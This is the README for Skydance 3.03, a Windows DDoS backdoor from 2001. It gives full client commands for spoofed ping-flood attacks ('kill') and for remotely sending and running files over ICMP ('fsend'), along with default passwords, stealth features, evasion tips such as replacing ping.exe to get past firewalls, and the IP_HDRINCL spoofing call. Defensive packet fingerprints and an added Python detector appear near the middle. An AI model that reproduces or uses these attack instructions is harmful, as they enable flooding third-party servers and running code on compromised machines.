Skydance 3.03
(Backdoor.Win32.SkyDance.303)

by Edrin

Written in Microsoft Visual C++

Released in March 2001

Made in Germany

This is Skydance 3.03, by [email protected]!
This is README.TXT, version 3
http://skd.box.sk

Disclaimer - Read This First:
	Everything in this document is based on the results I got from developing Skydance.
	Skydance 3.03 is an EXAMPLE of a Distributed Denial of Service attack!
	Use the SKYDANCE 3.03 SOURCE, README AND BINARY AT YOUR OWN RISK; I will NEVER be
	responsible for any HARM or harmful things that happen because the SKYDANCE
	source was USED! That means I do NOT guarantee any features or
	security properties, and I do not guarantee that this program works properly!!!
	Indeed I guarantee nothing ;)
	Use the binaries to test how a DDoS is used! Do not install the Skydance binary on
	a system that you do not own because this is probably illegal! Do not use Skydance and its
	components to attack a server because this is illegal, too!
	Use this source and binary only to learn how to defend/protect against Windows DDoS!
	Do not modify the binary and do not give it to another person!
	Use the SKYDANCE 3.03 SOURCE, README AND BINARY AT YOUR OWN RISK!

	suggestions against SKD303DDoS: go to ---> 4. d)

#tested with win98 and win2k
------------------------------------------------------------------------------------------------------
password for binary files in ZIP: dontharm
if you compile it "as it is" without changes:
#######################################
#Note: for skd303s.exe <pass> = nerv  #
#######################################

	1. What is it?
	2. client usage:
	3. About source code:
	4. How to filter SKD303DDoS pongs
	5. ICMP "ability" of win32 winsock (ICMPs you can receive)
	6. Some words about DDoS servers that use Windows OS.


1. What is it?

	Skydance 3.03 is a DDoS for win32 using RAW sockets.
	The source includes these features:
	- communication over ICMP, including a simple standard-Windows-"abcd..." ping attack
	- cannot be found with netstat -a (ICMP, so no listening port)
	- cannot be found with usual port scanners (RAW sockets)
	- on win2k systems communication and attacks are spoofed (IP_HDRINCL)
	- server binary can be packed down to 17 KB
	- client source can be ported to Unix because it is done as a console app
	- (ICMP tunnel) a file (<65 KB) can be sent within a spoofed ICMP packet and is executed after receipt

2. client usage:

	Usage:
	The client will try to use a spoofed source address. You should test your
	spoofing ability first to ensure that you cannot be revealed. The test
	will fail on WinNT and Win9x/Me systems. It should not fail under Win2000.

	<spoofed-IP> and <target> must be in the style xxx.xxx.xxx.xxx
	By default it is 216.32.74.55 = www.yahoo.com
	<pass> must be <= 4 letters!

	- To test spoofing ability:
	   skd303c spoofing
	
	- Get server info (always unspoofed packets!):
	   skd303c <server> <pass> info
	   Sample: skd303c myknight.com diva info
	
	- To attack with spoofed standard Windows pings:
	   skd303c <server> <pass> kill <target> <time-in-minutes> <spoofed-IP>
	   Sample: skd303c myknight.com diva kill 166.166.166.166 10 12.34.56.78
	   <time-in-minutes> can be up to 1440

	- To send and execute a file with a spoofed standard Windows pong:
	   skd303c <server> <pass> fsend <file-name> <new-filename> <spoofed-IP>
	   Sample: skd303c myknight.com diva fsend c:\myfile.exe myfile.exe 98.76.54.32
	   <file-name> SIZE can be up to 6540 bytes, <new-filename> can have up to 39 letters

	DO NOT HARM PEOPLE! HELP CHILDREN IN AFRICA!

	greetings, Edrin

3. About source code:

	why this source would need to be modified to abuse it:

	first of all: it is not possible to receive ICMP_ECHOREQUESTS
	with winsock (-> 5.), so I decided to use ICMP_ECHORESPONSE in my
	source. Anyway, this makes things much easier for firewalls.

	next thing: communication pongs have the standard Unix ping size...
	but anyway I'm not sure. 84 bytes in total? (IP header 20 + ICMP 64)

	the standard Windows pings are the only attack I added, and this attack is
	not very powerful; a simple firewall might be able to stop an attack.
	The size of this standard Windows ping is #define STANDART_PINGSIZE 60 (bytes),
	which means the data flood is not as big as it could be!
	There are probably other DoS that are much more effective. Anyway, my win2k
	550 MHz had 100% CPU usage in a 10 MBit local area net.

	In addition to that it would be necessary that the info function returns
	the OS version, to make sure that a server is "spoofable".

	Another thing that can reveal Skydance: I didn't crypt the
	unsigned char cCommand;	(the command in my message struct)
	so a sniffer would always see a k (kill), i (info) or f (file)
	at position FULL_PACKET[35 ?]
	For example someone could use the first password letter +/- xy for
	a "crypted" command, or maybe some real crypto; in my opinion crypto
	is not really necessary.

	And there is no self-installing code in my source!

4. How to filter SKD303DDoS pongs
	As I already mentioned,
	in communication pongs:

	a) communication uses Unix-style 84-byte PONGS (ICMP_ECHORESPONSE)
	b) 'k', 'i', 'f' at position FULL_PACKET[35] or ICMP_STRUCT[15] (IP header = 20 bytes)
	c) an 'i' pong is UNSPOOFED, so a TRACE-BACK would be possible!
---->>	d) block each suspicious "ok-ICMP" (-> 5.) I THINK THIS WOULD PROTECT BEST!!!
	
	I have no more ideas, do you?
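
Detection logic for fingerprints a), b) and c) above, written as an added example in Python; it is not part of Edrin's README or the Skydance source. classify_icmp and build_sample are names chosen here, and build_sample produces a constructed test vector that models only the 84-byte echo reply and the marker byte at offset 35, nothing else of the tool's format.

```python
import ipaddress
import struct

# Fingerprint from the README: 84-byte echo reply, 20-byte IP header, command
# letter 'k'/'i'/'f' at FULL_PACKET[35] (== ICMP[15]).
IP_HDR_LEN, SKD_TOTAL_LEN, SKD_CMD_OFFSET = 20, 84, 35
SKD_COMMANDS = {ord("k"): "kill", ord("i"): "info", ord("f"): "file"}

def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum; 0 when run over a correct header."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def classify_icmp(pkt: bytes):
    """Return ("skd303", command, src_ip) when pkt matches the fingerprint,
    else (None, reason, src_ip). src_ip is None if the header is unusable."""
    if len(pkt) < IP_HDR_LEN or pkt[0] >> 4 != 4:
        return None, "not IPv4 / too short", None
    ihl, total_len, proto = (pkt[0] & 0x0F) * 4, struct.unpack("!H", pkt[2:4])[0], pkt[9]
    src = str(ipaddress.IPv4Address(bytes(pkt[12:16])))
    if proto != 1 or len(pkt) < total_len:
        return None, "not a complete ICMP datagram", src
    icmp = pkt[ihl:total_len]
    if inet_checksum(pkt[:ihl]) or inet_checksum(icmp):
        return None, "bad checksum (corrupt or truncated)", src
    if icmp[0] != 0:
        return None, "ICMP type %d, not echo reply" % icmp[0], src
    if ihl != IP_HDR_LEN or total_len != SKD_TOTAL_LEN:
        return None, "echo reply, but not 84 bytes", src
    cmd = SKD_COMMANDS.get(pkt[SKD_CMD_OFFSET])
    if cmd is None:
        return None, "echo reply, no k/i/f marker", src
    return "skd303", cmd, src   # an 'info' pong is unspoofed: src is worth logging

def build_sample(cmd: str, src: str, dst: str = "192.0.2.1") -> bytes:
    """Constructed test vector, not a real SKD303 packet: an 84-byte echo reply
    with only the marker byte set. Used to exercise the classifier offline."""
    payload = bytearray(56)                    # 8-byte ICMP header + 56 data = 64
    payload[7] = ord(cmd)                      # ICMP[15] == payload[7]
    icmp = bytearray(struct.pack("!BBHHH", 0, 0, 0, 1, 1)) + payload
    struct.pack_into("!H", icmp, 2, inet_checksum(bytes(icmp)))
    ip = bytearray(struct.pack("!BBHHHBBH4s4s", 0x45, 0, IP_HDR_LEN + len(icmp), 0, 0, 64, 1, 0,
                               ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed))
    struct.pack_into("!H", ip, 10, inet_checksum(bytes(ip)))
    return bytes(ip + icmp)
```

Feed classify_icmp raw IPv4 frames from a capture; checksum validation keeps corrupt or truncated echo replies from triggering the marker match.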

5. ICMP "ability" of win32 winsock (ICMPs you can receive)
	Blocking each "ok-ICMP" might block the communication of every win-ICMP-DDoS.
	I tested it in a few minutes, no warranty, prove it yourself!

	type  name                                     received?
	  0   Echo reply                               ok
	  1   Reserved                                 ok
	  2   Reserved                                 ok
	  3   Destination unreachable                  failed
	  4   Source quench                            failed
	  5   Redirect                                 failed
	  6   Alternate Host Address                   ok
	  7                                            ok
	  8   Echo request                             failed  (this "would" be nice to receive)
	  9   Router advertisement                     ok
	 10   Router solicitation                      ok
	 11   Time exceeded                            failed
	 12   Parameter problem                        failed
	 13   Timestamp request                        failed
	 14   Timestamp reply                          ok
	 15   Information request                      ok
	 16   Information reply                        ok
	 17   Address mask request                     failed
	 18   Address mask reply                       ok
	 19   Reserved (for security)                  ok
	 20                                            ok
	  -                                            unknown
	 29   Reserved (for robustness experiment)     ok
	 30   Traceroute                               ok
	 31   Conversion error                         ok
	 32   Mobile Host Redirect                     ok
	 33   IPv6 Where-Are-You                       ok
	 34   IPv6 I-Am-Here                           ok
	 35   Mobile Registration Request              ok
	 36   Mobile Registration Reply                ok
	 37   Domain Name request                      ok
	 38   Domain Name reply                        ok
	 39   SKIP Algorithm Discovery Protocol        ok
	 40   Photuris, Security failures              ok
	 41                                            ok
	  -                                            unknown
	255   Reserved                                 ok

6. Some words about DDoS from Windows OS.
	The new feature IP_HDRINCL that comes with win2k can turn Windows into a powerful
	DDoS server because it enables IP spoofing!

	IP_HDRINCL in source:
	--> setsockopt(ssock, IPPROTO_IP, IP_HDRINCL, (char *)&bOpt, sizeof(bOpt)); <--

	That means win2k servers will become a base for DDoS that is equal to *nix servers.

	Anyway, most Windows systems remain dial-in computers that have a dynamic IP. That means
	such a DDoS as SKD3.03 cannot be used with them in a serious way. I think for such
	computers the most threatening DDoS remains IRC "bots"!

	Firewalls that control each winsock access are quite good. They would probably detect
	DDoS servers. Anyway: maybe you can replace ping.exe with a DDoS and maybe the firewall does not
	detect a DDoS then...


Thx for reading,
[email protected]

MegaSecurity